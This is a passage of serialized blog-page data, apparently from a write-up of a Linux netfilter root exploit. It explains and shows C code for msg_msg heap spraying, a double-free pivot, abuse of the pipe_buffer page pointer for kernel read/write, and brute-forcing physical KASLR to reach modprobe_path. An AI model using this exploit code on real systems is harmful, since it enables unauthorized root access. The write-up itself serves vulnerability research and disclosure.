*/\n",{"type":27,"tag":207,"props":64828,"children":64829},{"class":209,"line":2065},[64830],{"type":27,"tag":207,"props":64831,"children":64832},{"style":238},[64833],{"type":33,"value":23852},{"type":27,"tag":207,"props":64835,"children":64836},{"class":209,"line":2092},[64837],{"type":27,"tag":207,"props":64838,"children":64839},{"style":238},[64840],{"type":33,"value":17595},{"type":27,"tag":207,"props":64842,"children":64843},{"class":209,"line":2130},[64844],{"type":27,"tag":207,"props":64845,"children":64846},{"style":238},[64847],{"type":33,"value":64848},"struct list_head {\n",{"type":27,"tag":207,"props":64850,"children":64851},{"class":209,"line":2168},[64852,64856,64860,64864,64868,64872,64876],{"type":27,"tag":207,"props":64853,"children":64854},{"style":214},[64855],{"type":33,"value":28423},{"type":27,"tag":207,"props":64857,"children":64858},{"style":8920},[64859],{"type":33,"value":64738},{"type":27,"tag":207,"props":64861,"children":64862},{"style":214},[64863],{"type":33,"value":17093},{"type":27,"tag":207,"props":64865,"children":64866},{"style":220},[64867],{"type":33,"value":4186},{"type":27,"tag":207,"props":64869,"children":64870},{"style":238},[64871],{"type":33,"value":1123},{"type":27,"tag":207,"props":64873,"children":64874},{"style":226},[64875],{"type":33,"value":9286},{"type":27,"tag":207,"props":64877,"children":64878},{"style":238},[64879],{"type":33,"value":64880},"prev;\n",{"type":27,"tag":207,"props":64882,"children":64883},{"class":209,"line":4095},[64884],{"type":27,"tag":207,"props":64885,"children":64886},{"style":238},[64887],{"type":33,"value":23852},{"type":27,"tag":36,"props":64889,"children":64890},{},[64891,64893,64899,64901,64906],{"type":33,"value":64892},"This is particularly interesting if we send messages of different sizes on the same queue, making the ",{"type":27,"tag":84,"props":64894,"children":64896},{"className":64895},[],[64897],{"type":33,"value":64898},"mlist.next",{"type":33,"value":64900}," pointer of a message that lives in one cache point into a different cache. So, by spraying ",{"type":27,"tag":84,"props":64902,"children":64904},{"className":64903},[],[64905],{"type":33,"value":64678},{"type":33,"value":64907}," in kmalloc-cg-256 with a secondary message in each queue living in kmalloc-cg-1k.",{"type":27,"tag":36,"props":64909,"children":64910},{},[64911,64913,64918,64920],{"type":33,"value":64912},"By incrementing the next pointer of our controllable ",{"type":27,"tag":84,"props":64914,"children":64916},{"className":64915},[],[64917],{"type":33,"value":64678},{"type":33,"value":64919}," by 256, we are able to make it point to the different secondary message that is already referenced by a different primary message, creating a duplicated reference. We allow an easy way of pivoting our double-free capabilities to other caches and attacking a greater variety of objects.\n",{"type":27,"tag":126,"props":64921,"children":64923},{"alt":57817,"src":64922},"/posts/netfilter-universal-root-1-day/msg-msg.png",[],{"type":27,"tag":101,"props":64925,"children":64927},{"className":8877,"code":64926,"language":8876,"meta":7,"style":7},"[...]\n // Spray msg_msg in kmalloc-256 and kmalloc-1k\n msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);\n int qid[SPRAY];\n for (int i = 0; i \u003C SPRAY; i++)\n {\n qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n if (qid[i] \u003C 0)\n {\n perror(\"[-] msgget\");\n }\n *(uint32_t *)msg->mtext = i;\n *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;\n msg->mtype = MTYPE_PRIMARY;\n msgsnd(qid[i], msg, 0xe8 - 48, 0);\n msg->mtype = MTYPE_SECONDARY;\n msgsnd(qid[i], msg, 1024 - 48, 0);\n }\n // Prepare evil msg\n int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n if (evilqid \u003C 0)\n {\n perror(\"[-] msgget\");\n }\n[...] // trigger double-free in kmalloc-256\n",[64928],{"type":27,"tag":84,"props":64929,"children":64930},{"__ignoreMap":7},[64931,64938,64946,64972,64989,65037,65044,65084,65116,65123,65144,65151,65198,65262,65288,65334,65358,65402,65409,65417,65453,65477,65484,65504,65511],{"type":27,"tag":207,"props":64932,"children":64933},{"class":209,"line":210},[64934],{"type":27,"tag":207,"props":64935,"children":64936},{"style":238},[64937],{"type":33,"value":17595},{"type":27,"tag":207,"props":64939,"children":64940},{"class":209,"line":244},[64941],{"type":27,"tag":207,"props":64942,"children":64943},{"style":238},[64944],{"type":33,"value":64945}," // Spray msg_msg in kmalloc-256 and kmalloc-1k\n",{"type":27,"tag":207,"props":64947,"children":64948},{"class":209,"line":270},[64949,64954,64958,64962,64967],{"type":27,"tag":207,"props":64950,"children":64951},{"style":238},[64952],{"type":33,"value":64953}," msg_t *msg = calloc(1, ",{"type":27,"tag":207,"props":64955,"children":64956},{"style":8920},[64957],{"type":33,"value":62563},{"type":27,"tag":207,"props":64959,"children":64960},{"style":238},[64961],{"type":33,"value":1343},{"type":27,"tag":207,"props":64963,"children":64964},{"style":8920},[64965],{"type":33,"value":64966},"msg_t",{"type":27,"tag":207,"props":64968,"children":64969},{"style":238},[64970],{"type":33,"value":64971},") + 0xe8 - 48);\n",{"type":27,"tag":207,"props":64973,"children":64974},{"class":209,"line":296},[64975,64979,64984],{"type":27,"tag":207,"props":64976,"children":64977},{"style":214},[64978],{"type":33,"value":26347},{"type":27,"tag":207,"props":64980,"children":64981},{"style":220},[64982],{"type":33,"value":64983}," qid",{"type":27,"tag":207,"props":64985,"children":64986},{"style":238},[64987],{"type":33,"value":64988},"[SPRAY];\n",{"type":27,"tag":207,"props":64990,"children":64991},{"class":209,"line":445},[64992,64996,65000,65004,65008,65012,65016,65020,65024,65029,65033],{"type":27,"tag":207,"props":64993,"children":64994},{"style":376},[64995],{"type":33,"value":10321},{"type":27,"tag":207,"props":64997,"children":64998},{"style":238},[64999],{"type":33,"value":686},{"type":27,"tag":207,"props":65001,"children":65002},{"style":214},[65003],{"type":33,"value":26317},{"type":27,"tag":207,"props":65005,"children":65006},{"style":238},[65007],{"type":33,"value":61780},{"type":27,"tag":207,"props":65009,"children":65010},{"style":226},[65011],{"type":33,"value":10380},{"type":27,"tag":207,"props":65013,"children":65014},{"style":232},[65015],{"type":33,"value":4680},{"type":27,"tag":207,"props":65017,"children":65018},{"style":238},[65019],{"type":33,"value":58472},{"type":27,"tag":207,"props":65021,"children":65022},{"style":226},[65023],{"type":33,"value":9257},{"type":27,"tag":207,"props":65025,"children":65026},{"style":238},[65027],{"type":33,"value":65028}," SPRAY; i",{"type":27,"tag":207,"props":65030,"children":65031},{"style":226},[65032],{"type":33,"value":4713},{"type":27,"tag":207,"props":65034,"children":65035},{"style":238},[65036],{"type":33,"value":10449},{"type":27,"tag":207,"props":65038,"children":65039},{"class":209,"line":867},[65040],{"type":27,"tag":207,"props":65041,"children":65042},{"style":238},[65043],{"type":33,"value":36449},{"type":27,"tag":207,"props":65045,"children":65046},{"class":209,"line":892},[65047,65052,65056,65060,65065,65070,65075,65079],{"type":27,"tag":207,"props":65048,"children":65049},{"style":220},[65050],{"type":33,"value":65051}," qid",{"type":27,"tag":207,"props":65053,"children":65054},{"style":238},[65055],{"type":33,"value":61832},{"type":27,"tag":207,"props":65057,"children":65058},{"style":226},[65059],{"type":33,"value":10380},{"type":27,"tag":207,"props":65061,"children":65062},{"style":1335},[65063],{"type":33,"value":65064}," msgget",{"type":27,"tag":207,"props":65066,"children":65067},{"style":238},[65068],{"type":33,"value":65069},"(IPC_PRIVATE, ",{"type":27,"tag":207,"props":65071,"children":65072},{"style":232},[65073],{"type":33,"value":65074},"0666",{"type":27,"tag":207,"props":65076,"children":65077},{"style":226},[65078],{"type":33,"value":11553},{"type":27,"tag":207,"props":65080,"children":65081},{"style":238},[65082],{"type":33,"value":65083}," IPC_CREAT);\n",{"type":27,"tag":207,"props":65085,"children":65086},{"class":209,"line":1475},[65087,65091,65095,65100,65104,65108,65112],{"type":27,"tag":207,"props":65088,"children":65089},{"style":376},[65090],{"type":33,"value":10562},{"type":27,"tag":207,"props":65092,"children":65093},{"style":238},[65094],{"type":33,"value":686},{"type":27,"tag":207,"props":65096,"children":65097},{"style":220},[65098],{"type":33,"value":65099},"qid",{"type":27,"tag":207,"props":65101,"children":65102},{"style":238},[65103],{"type":33,"value":61832},{"type":27,"tag":207,"props":65105,"children":65106},{"style":226},[65107],{"type":33,"value":9257},{"type":27,"tag":207,"props":65109,"children":65110},{"style":232},[65111],{"type":33,"value":4680},{"type":27,"tag":207,"props":65113,"children":65114},{"style":238},[65115],{"type":33,"value":10449},{"type":27,"tag":207,"props":65117,"children":65118},{"class":209,"line":2065},[65119],{"type":27,"tag":207,"props":65120,"children":65121},{"style":238},[65122],{"type":33,"value":38919},{"type":27,"tag":207,"props":65124,"children":65125},{"class":209,"line":2092},[65126,65131,65135,65140],{"type":27,"tag":207,"props":65127,"children":65128},{"style":1335},[65129],{"type":33,"value":65130}," perror",{"type":27,"tag":207,"props":65132,"children":65133},{"style":238},[65134],{"type":33,"value":1343},{"type":27,"tag":207,"props":65136,"children":65137},{"style":1325},[65138],{"type":33,"value":65139},"\"[-] msgget\"",{"type":27,"tag":207,"props":65141,"children":65142},{"style":238},[65143],{"type":33,"value":1455},{"type":27,"tag":207,"props":65145,"children":65146},{"class":209,"line":2130},[65147],{"type":27,"tag":207,"props":65148,"children":65149},{"style":238},[65150],{"type":33,"value":10637},{"type":27,"tag":207,"props":65152,"children":65153},{"class":209,"line":2168},[65154,65158,65162,65167,65171,65175,65180,65184,65189,65193],{"type":27,"tag":207,"props":65155,"children":65156},{"style":226},[65157],{"type":33,"value":15034},{"type":27,"tag":207,"props":65159,"children":65160},{"style":238},[65161],{"type":33,"value":1343},{"type":27,"tag":207,"props":65163,"children":65164},{"style":214},[65165],{"type":33,"value":65166},"uint32_t",{"type":27,"tag":207,"props":65168,"children":65169},{"style":226},[65170],{"type":33,"value":17093},{"type":27,"tag":207,"props":65172,"children":65173},{"style":238},[65174],{"type":33,"value":10416},{"type":27,"tag":207,"props":65176,"children":65177},{"style":220},[65178],{"type":33,"value":65179},"msg",{"type":27,"tag":207,"props":65181,"children":65182},{"style":238},[65183],{"type":33,"value":8968},{"type":27,"tag":207,"props":65185,"children":65186},{"style":220},[65187],{"type":33,"value":65188},"mtext",{"type":27,"tag":207,"props":65190,"children":65191},{"style":226},[65192],{"type":33,"value":229},{"type":27,"tag":207,"props":65194,"children":65195},{"style":238},[65196],{"type":33,"value":65197}," i;\n",{"type":27,"tag":207,"props":65199,"children":65200},{"class":209,"line":4095},[65201,65205,65209,65213,65217,65221,65225,65229,65233,65237,65241,65245,65249,65253,65258],{"type":27,"tag":207,"props":65202,"children":65203},{"style":226},[65204],{"type":33,"value":15034},{"type":27,"tag":207,"props":65206,"children":65207},{"style":238},[65208],{"type":33,"value":1343},{"type":27,"tag":207,"props":65210,"children":65211},{"style":214},[65212],{"type":33,"value":62870},{"type":27,"tag":207,"props":65214,"children":65215},{"style":226},[65216],{"type":33,"value":17093},{"type":27,"tag":207,"props":65218,"children":65219},{"style":238},[65220],{"type":33,"value":10416},{"type":27,"tag":207,"props":65222,"children":65223},{"style":226},[65224],{"type":33,"value":10398},{"type":27,"tag":207,"props":65226,"children":65227},{"style":220},[65228],{"type":33,"value":65179},{"type":27,"tag":207,"props":65230,"children":65231},{"style":238},[65232],{"type":33,"value":8968},{"type":27,"tag":207,"props":65234,"children":65235},{"style":220},[65236],{"type":33,"value":65188},{"type":27,"tag":207,"props":65238,"children":65239},{"style":238},[65240],{"type":33,"value":11019},{"type":27,"tag":207,"props":65242,"children":65243},{"style":232},[65244],{"type":33,"value":3578},{"type":27,"tag":207,"props":65246,"children":65247},{"style":238},[65248],{"type":33,"value":15942},{"type":27,"tag":207,"props":65250,"children":65251},{"style":226},[65252],{"type":33,"value":10380},{"type":27,"tag":207,"props":65254,"children":65255},{"style":232},[65256],{"type":33,"value":65257}," 0xdeadbeefcafebabe",{"type":27,"tag":207,"props":65259,"children":65260},{"style":238},[65261],{"type":33,"value":241},{"type":27,"tag":207,"props":65263,"children":65264},{"class":209,"line":4103},[65265,65270,65274,65279,65283],{"type":27,"tag":207,"props":65266,"children":65267},{"style":220},[65268],{"type":33,"value":65269}," msg",{"type":27,"tag":207,"props":65271,"children":65272},{"style":238},[65273],{"type":33,"value":8968},{"type":27,"tag":207,"props":65275,"children":65276},{"style":220},[65277],{"type":33,"value":65278},"mtype",{"type":27,"tag":207,"props":65280,"children":65281},{"style":226},[65282],{"type":33,"value":229},{"type":27,"tag":207,"props":65284,"children":65285},{"style":238},[65286],{"type":33,"value":65287}," MTYPE_PRIMARY;\n",{"type":27,"tag":207,"props":65289,"children":65290},{"class":209,"line":4154},[65291,65296,65300,65304,65309,65313,65317,65322,65326,65330],{"type":27,"tag":207,"props":65292,"children":65293},{"style":1335},[65294],{"type":33,"value":65295}," msgsnd",{"type":27,"tag":207,"props":65297,"children":65298},{"style":238},[65299],{"type":33,"value":1343},{"type":27,"tag":207,"props":65301,"children":65302},{"style":220},[65303],{"type":33,"value":65099},{"type":27,"tag":207,"props":65305,"children":65306},{"style":238},[65307],{"type":33,"value":65308},"[i], msg, ",{"type":27,"tag":207,"props":65310,"children":65311},{"style":232},[65312],{"type":33,"value":63206},{"type":27,"tag":207,"props":65314,"children":65315},{"style":226},[65316],{"type":33,"value":544},{"type":27,"tag":207,"props":65318,"children":65319},{"style":232},[65320],{"type":33,"value":65321}," 48",{"type":27,"tag":207,"props":65323,"children":65324},{"style":238},[65325],{"type":33,"value":1123},{"type":27,"tag":207,"props":65327,"children":65328},{"style":232},[65329],{"type":33,"value":1660},{"type":27,"tag":207,"props":65331,"children":65332},{"style":238},[65333],{"type":33,"value":1455},{"type":27,"tag":207,"props":65335,"children":65336},{"class":209,"line":4203},[65337,65341,65345,65349,65353],{"type":27,"tag":207,"props":65338,"children":65339},{"style":220},[65340],{"type":33,"value":65269},{"type":27,"tag":207,"props":65342,"children":65343},{"style":238},[65344],{"type":33,"value":8968},{"type":27,"tag":207,"props":65346,"children":65347},{"style":220},[65348],{"type":33,"value":65278},{"type":27,"tag":207,"props":65350,"children":65351},{"style":226},[65352],{"type":33,"value":229},{"type":27,"tag":207,"props":65354,"children":65355},{"style":238},[65356],{"type":33,"value":65357}," MTYPE_SECONDARY;\n",{"type":27,"tag":207,"props":65359,"children":65360},{"class":209,"line":4249},[65361,65365,65369,65373,65377,65382,65386,65390,65394,65398],{"type":27,"tag":207,"props":65362,"children":65363},{"style":1335},[65364],{"type":33,"value":65295},{"type":27,"tag":207,"props":65366,"children":65367},{"style":238},[65368],{"type":33,"value":1343},{"type":27,"tag":207,"props":65370,"children":65371},{"style":220},[65372],{"type":33,"value":65099},{"type":27,"tag":207,"props":65374,"children":65375},{"style":238},[65376],{"type":33,"value":65308},{"type":27,"tag":207,"props":65378,"children":65379},{"style":232},[65380],{"type":33,"value":65381},"1024",{"type":27,"tag":207,"props":65383,"children":65384},{"style":226},[65385],{"type":33,"value":544},{"type":27,"tag":207,"props":65387,"children":65388},{"style":232},[65389],{"type":33,"value":65321},{"type":27,"tag":207,"props":65391,"children":65392},{"style":238},[65393],{"type":33,"value":1123},{"type":27,"tag":207,"props":65395,"children":65396},{"style":232},[65397],{"type":33,"value":1660},{"type":27,"tag":207,"props":65399,"children":65400},{"style":238},[65401],{"type":33,"value":1455},{"type":27,"tag":207,"props":65403,"children":65404},{"class":209,"line":4290},[65405],{"type":27,"tag":207,"props":65406,"children":65407},{"style":238},[65408],{"type":33,"value":10645},{"type":27,"tag":207,"props":65410,"children":65411},{"class":209,"line":4304},[65412],{"type":27,"tag":207,"props":65413,"children":65414},{"style":4647},[65415],{"type":33,"value":65416}," // Prepare evil msg\n",{"type":27,"tag":207,"props":65418,"children":65419},{"class":209,"line":5466},[65420,65424,65429,65433,65437,65441,65445,65449],{"type":27,"tag":207,"props":65421,"children":65422},{"style":214},[65423],{"type":33,"value":26347},{"type":27,"tag":207,"props":65425,"children":65426},{"style":238},[65427],{"type":33,"value":65428}," evilqid ",{"type":27,"tag":207,"props":65430,"children":65431},{"style":226},[65432],{"type":33,"value":10380},{"type":27,"tag":207,"props":65434,"children":65435},{"style":1335},[65436],{"type":33,"value":65064},{"type":27,"tag":207,"props":65438,"children":65439},{"style":238},[65440],{"type":33,"value":65069},{"type":27,"tag":207,"props":65442,"children":65443},{"style":232},[65444],{"type":33,"value":65074},{"type":27,"tag":207,"props":65446,"children":65447},{"style":226},[65448],{"type":33,"value":11553},{"type":27,"tag":207,"props":65450,"children":65451},{"style":238},[65452],{"type":33,"value":65083},{"type":27,"tag":207,"props":65454,"children":65455},{"class":209,"line":5530},[65456,65460,65465,65469,65473],{"type":27,"tag":207,"props":65457,"children":65458},{"style":376},[65459],{"type":33,"value":19556},{"type":27,"tag":207,"props":65461,"children":65462},{"style":238},[65463],{"type":33,"value":65464}," (evilqid ",{"type":27,"tag":207,"props":65466,"children":65467},{"style":226},[65468],{"type":33,"value":9257},{"type":27,"tag":207,"props":65470,"children":65471},{"style":232},[65472],{"type":33,"value":4680},{"type":27,"tag":207,"props":65474,"children":65475},{"style":238},[65476],{"type":33,"value":10449},{"type":27,"tag":207,"props":65478,"children":65479},{"class":209,"line":7900},[65480],{"type":27,"tag":207,"props":65481,"children":65482},{"style":238},[65483],{"type":33,"value":36449},{"type":27,"tag":207,"props":65485,"children":65486},{"class":209,"line":7909},[65487,65492,65496,65500],{"type":27,"tag":207,"props":65488,"children":65489},{"style":1335},[65490],{"type":33,"value":65491}," perror",{"type":27,"tag":207,"props":65493,"children":65494},{"style":238},[65495],{"type":33,"value":1343},{"type":27,"tag":207,"props":65497,"children":65498},{"style":1325},[65499],{"type":33,"value":65139},{"type":27,"tag":207,"props":65501,"children":65502},{"style":238},[65503],{"type":33,"value":1455},{"type":27,"tag":207,"props":65505,"children":65506},{"class":209,"line":7917},[65507],{"type":27,"tag":207,"props":65508,"children":65509},{"style":238},[65510],{"type":33,"value":10645},{"type":27,"tag":207,"props":65512,"children":65513},{"class":209,"line":7926},[65514],{"type":27,"tag":207,"props":65515,"children":65516},{"style":238},[65517],{"type":33,"value":65518},"[...] // trigger double-free in kmalloc-256\n",{"type":27,"tag":58,"props":65520,"children":65522},{"id":65521},"using-pipe_buffer-page-pointer-for-physical-readwrite",[65523],{"type":33,"value":65524},"Using pipe_buffer->page pointer for physical read/write",{"type":27,"tag":36,"props":65526,"children":65527},{},[65528,65530,65536,65537,65543,65544,65550,65552,65558],{"type":33,"value":65529},"Now that we have increased the reach of our double-free, it's probably a good idea to go to ",{"type":27,"tag":84,"props":65531,"children":65533},{"className":65532},[],[65534],{"type":33,"value":65535},"kmalloc-1k",{"type":33,"value":1131},{"type":27,"tag":84,"props":65538,"children":65540},{"className":65539},[],[65541],{"type":33,"value":65542},"overlap pipe_buffer",{"type":33,"value":28776},{"type":27,"tag":84,"props":65545,"children":65547},{"className":65546},[],[65548],{"type":33,"value":65549},"skbuf",{"type":33,"value":65551}," data to control the ",{"type":27,"tag":84,"props":65553,"children":65555},{"className":65554},[],[65556],{"type":33,"value":65557},"page",{"type":33,"value":65559}," field.",{"type":27,"tag":36,"props":65561,"children":65562},{},[65563,65564,65569,65571,65577,65579],{"type":33,"value":23888},{"type":27,"tag":84,"props":65565,"children":65567},{"className":65566},[],[65568],{"type":33,"value":65557},{"type":33,"value":65570}," field is a pointer into ",{"type":27,"tag":84,"props":65572,"children":65574},{"className":65573},[],[65575],{"type":33,"value":65576},"vmemmap_base",{"type":33,"value":65578},", which contains all page structs used to track memory mapped to the kernel. This pointer is used to fetch the address of the data associated with a given pipe when reading/writing.\n",{"type":27,"tag":126,"props":65580,"children":65582},{"alt":57817,"src":65581},"/posts/netfilter-universal-root-1-day/pipe-buffer.png",[],{"type":27,"tag":36,"props":65584,"children":65585},{},[65586,65588,65593],{"type":33,"value":65587},"This now allows us to navigate the ",{"type":27,"tag":84,"props":65589,"children":65591},{"className":65590},[],[65592],{"type":33,"value":65576},{"type":33,"value":65594}," array and use our pipe as an interface to read/write kernel memory directly.",{"type":27,"tag":58,"props":65596,"children":65598},{"id":65597},"bruteforce-physical-kernel-base",[65599],{"type":33,"value":65600},"Bruteforce physical kernel base",{"type":27,"tag":36,"props":65602,"children":65603},{},[65604,65606,65612,65614,65619,65621,65627],{"type":33,"value":65605},"With the capability to iterate over kernel memory pages and read/write them, we could easily look for any value we want to overwrite, such as ",{"type":27,"tag":84,"props":65607,"children":65609},{"className":65608},[],[65610],{"type":33,"value":65611},"modprobe_path",{"type":33,"value":65613},". Keep in mind that simply searching page by page from the start of ",{"type":27,"tag":84,"props":65615,"children":65617},{"className":65616},[],[65618],{"type":33,"value":65576},{"type":33,"value":65620}," can be very time-consuming because the physical address at which the kernel base is loaded is randomized. However, the start of the kernel base is always aligned by a constant ",{"type":27,"tag":84,"props":65622,"children":65624},{"className":65623},[],[65625],{"type":33,"value":65626},"PHYSICAL_ALIGN",{"type":33,"value":65628}," value, 0x200000 by default in amd64, so we can significantly speed up our search by first only looking at aligned addresses for something that looks like the kernel base and then start a page by page search from there.",{"type":27,"tag":101,"props":65630,"children":65632},{"className":8877,"code":65631,"language":8876,"meta":7,"style":7},"[...]\n// Bruteforce phys-KASLR\n uint64_t kernel_base;\n bool found = false;\n uint8_t data[PAGE_SIZE] = {0};\n puts(\"[*] bruteforce phys-KASLR\");\n for (uint64_t i = 0;; i++)\n {\n kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);\n pipebuf->page = vmemmap_base + kernel_base;\n pipebuf->offset = 0;\n pipebuf->len = PAGE_SIZE + 1;\n[...]\n for (int j = 0; j \u003C PIPE_SPRAY; j++)\n {\n memset(&data, 0, PAGE_SIZE);\n int count;\n if (count = read(pfd[j][0], &data, PAGE_SIZE) \u003C 0)\n {\n continue;\n }\n[...]\n\n if (is_kernel_base(data)) // [1] identify kernel base\n {\n found = true;\n break;\n }\n }\n\n[...]\n",[65633],{"type":27,"tag":84,"props":65634,"children":65635},{"__ignoreMap":7},[65636,65643,65651,65659,65683,65716,65736,65776,65783,65827,65861,65888,65924,65931,65977,65984,66014,66027,66092,66099,66111,66119,66126,66133,66159,66166,66186,66198,66205,66212,66219],{"type":27,"tag":207,"props":65637,"children":65638},{"class":209,"line":210},[65639],{"type":27,"tag":207,"props":65640,"children":65641},{"style":238},[65642],{"type":33,"value":17595},{"type":27,"tag":207,"props":65644,"children":65645},{"class":209,"line":244},[65646],{"type":27,"tag":207,"props":65647,"children":65648},{"style":238},[65649],{"type":33,"value":65650},"// Bruteforce phys-KASLR\n",{"type":27,"tag":207,"props":65652,"children":65653},{"class":209,"line":270},[65654],{"type":27,"tag":207,"props":65655,"children":65656},{"style":238},[65657],{"type":33,"value":65658}," uint64_t kernel_base;\n",{"type":27,"tag":207,"props":65660,"children":65661},{"class":209,"line":296},[65662,65666,65671,65675,65679],{"type":27,"tag":207,"props":65663,"children":65664},{"style":214},[65665],{"type":33,"value":53715},{"type":27,"tag":207,"props":65667,"children":65668},{"style":238},[65669],{"type":33,"value":65670}," found ",{"type":27,"tag":207,"props":65672,"children":65673},{"style":226},[65674],{"type":33,"value":10380},{"type":27,"tag":207,"props":65676,"children":65677},{"style":214},[65678],{"type":33,"value":16337},{"type":27,"tag":207,"props":65680,"children":65681},{"style":238},[65682],{"type":33,"value":241},{"type":27,"tag":207,"props":65684,"children":65685},{"class":209,"line":445},[65686,65691,65695,65700,65704,65708,65712],{"type":27,"tag":207,"props":65687,"children":65688},{"style":214},[65689],{"type":33,"value":65690}," uint8_t",{"type":27,"tag":207,"props":65692,"children":65693},{"style":220},[65694],{"type":33,"value":22379},{"type":27,"tag":207,"props":65696,"children":65697},{"style":238},[65698],{"type":33,"value":65699},"[PAGE_SIZE] ",{"type":27,"tag":207,"props":65701,"children":65702},{"style":226},[65703],{"type":33,"value":10380},{"type":27,"tag":207,"props":65705,"children":65706},{"style":238},[65707],{"type":33,"value":52459},{"type":27,"tag":207,"props":65709,"children":65710},{"style":232},[65711],{"type":33,"value":1660},{"type":27,"tag":207,"props":65713,"children":65714},{"style":238},[65715],{"type":33,"value":23852},{"type":27,"tag":207,"props":65717,"children":65718},{"class":209,"line":867},[65719,65723,65727,65732],{"type":27,"tag":207,"props":65720,"children":65721},{"style":1335},[65722],{"type":33,"value":62742},{"type":27,"tag":207,"props":65724,"children":65725},{"style":238},[65726],{"type":33,"value":1343},{"type":27,"tag":207,"props":65728,"children":65729},{"style":1325},[65730],{"type":33,"value":65731},"\"[*] bruteforce phys-KASLR\"",{"type":27,"tag":207,"props":65733,"children":65734},{"style":238},[65735],{"type":33,"value":1455},{"type":27,"tag":207,"props":65737,"children":65738},{"class":209,"line":892},[65739,65743,65747,65751,65755,65759,65763,65768,65772],{"type":27,"tag":207,"props":65740,"children":65741},{"style":376},[65742],{"type":33,"value":10321},{"type":27,"tag":207,"props":65744,"children":65745},{"style":238},[65746],{"type":33,"value":686},{"type":27,"tag":207,"props":65748,"children":65749},{"style":214},[65750],{"type":33,"value":62870},{"type":27,"tag":207,"props":65752,"children":65753},{"style":238},[65754],{"type":33,"value":61780},{"type":27,"tag":207,"props":65756,"children":65757},{"style":226},[65758],{"type":33,"value":10380},{"type":27,"tag":207,"props":65760,"children":65761},{"style":232},[65762],{"type":33,"value":4680},{"type":27,"tag":207,"props":65764,"children":65765},{"style":238},[65766],{"type":33,"value":65767},";; i",{"type":27,"tag":207,"props":65769,"children":65770},{"style":226},[65771],{"type":33,"value":4713},{"type":27,"tag":207,"props":65773,"children":65774},{"style":238},[65775],{"type":33,"value":10449},{"type":27,"tag":207,"props":65777,"children":65778},{"class":209,"line":1475},[65779],{"type":27,"tag":207,"props":65780,"children":65781},{"style":238},[65782],{"type":33,"value":36449},{"type":27,"tag":207,"props":65784,"children":65785},{"class":209,"line":2065},[65786,65791,65795,65800,65804,65809,65813,65818,65822],{"type":27,"tag":207,"props":65787,"children":65788},{"style":238},[65789],{"type":33,"value":65790}," kernel_base ",{"type":27,"tag":207,"props":65792,"children":65793},{"style":226},[65794],{"type":33,"value":10380},{"type":27,"tag":207,"props":65796,"children":65797},{"style":232},[65798],{"type":33,"value":65799}," 0x40",{"type":27,"tag":207,"props":65801,"children":65802},{"style":226},[65803],{"type":33,"value":17093},{"type":27,"tag":207,"props":65805,"children":65806},{"style":238},[65807],{"type":33,"value":65808}," ((PHYSICAL_ALIGN ",{"type":27,"tag":207,"props":65810,"children":65811},{"style":226},[65812],{"type":33,"value":9286},{"type":27,"tag":207,"props":65814,"children":65815},{"style":238},[65816],{"type":33,"value":65817}," i) ",{"type":27,"tag":207,"props":65819,"children":65820},{"style":226},[65821],{"type":33,"value":20038},{"type":27,"tag":207,"props":65823,"children":65824},{"style":238},[65825],{"type":33,"value":65826}," PAGE_SHIFT);\n",{"type":27,"tag":207,"props":65828,"children":65829},{"class":209,"line":2092},[65830,65835,65839,65843,65847,65852,65856],{"type":27,"tag":207,"props":65831,"children":65832},{"style":220},[65833],{"type":33,"value":65834}," pipebuf",{"type":27,"tag":207,"props":65836,"children":65837},{"style":238},[65838],{"type":33,"value":8968},{"type":27,"tag":207,"props":65840,"children":65841},{"style":220},[65842],{"type":33,"value":65557},{"type":27,"tag":207,"props":65844,"children":65845},{"style":226},[65846],{"type":33,"value":229},{"type":27,"tag":207,"props":65848,"children":65849},{"style":238},[65850],{"type":33,"value":65851}," vmemmap_base ",{"type":27,"tag":207,"props":65853,"children":65854},{"style":226},[65855],{"type":33,"value":2227},{"type":27,"tag":207,"props":65857,"children":65858},{"style":238},[65859],{"type":33,"value":65860}," kernel_base;\n",{"type":27,"tag":207,"props":65862,"children":65863},{"class":209,"line":2130},[65864,65868,65872,65876,65880,65884],{"type":27,"tag":207,"props":65865,"children":65866},{"style":220},[65867],{"type":33,"value":65834},{"type":27,"tag":207,"props":65869,"children":65870},{"style":238},[65871],{"type":33,"value":8968},{"type":27,"tag":207,"props":65873,"children":65874},{"style":220},[65875],{"type":33,"value":21177},{"type":27,"tag":207,"props":65877,"children":65878},{"style":226},[65879],{"type":33,"value":229},{"type":27,"tag":207,"props":65881,"children":65882},{"style":232},[65883],{"type":33,"value":4680},{"type":27,"tag":207,"props":65885,"children":65886},{"style":238},[65887],{"type":33,"value":241},{"type":27,"tag":207,"props":65889,"children":65890},{"class":209,"line":2168},[65891,65895,65899,65903,65907,65912,65916,65920],{"type":27,"tag":207,"props":65892,"children":65893},{"style":220},[65894],{"type":33,"value":65834},{"type":27,"tag":207,"props":65896,"children":65897},{"style":238},[65898],{"type":33,"value":8968},{"type":27,"tag":207,"props":65900,"children":65901},{"style":220},[65902],{"type":33,"value":16416},{"type":27,"tag":207,"props":65904,"children":65905},{"style":226},[65906],{"type":33,"value":229},{"type":27,"tag":207,"props":65908,"children":65909},{"style":238},[65910],{"type":33,"value":65911}," PAGE_SIZE ",{"type":27,"tag":207,"props":65913,"children":65914},{"style":226},[65915],{"type":33,"value":2227},{"type":27,"tag":207,"props":65917,"children":65918},{"style":232},[65919],{"type":33,"value":235},{"type":27,"tag":207,"props":65921,"children":65922},{"style":238},[65923],{"type":33,"value":241},{"type":27,"tag":207,"props":65925,"children":65926},{"class":209,"line":4095},[65927],{"type":27,"tag":207,"props":65928,"children":65929},{"style":238},[65930],{"type":33,"value":17595},{"type":27,"tag":207,"props":65932,"children":65933},{"class":209,"line":4103},[65934,65939,65943,65947,65951,65955,65960,65964,65969,65973],{"type":27,"tag":207,"props":65935,"children":65936},{"style":238},[65937],{"type":33,"value":65938}," for 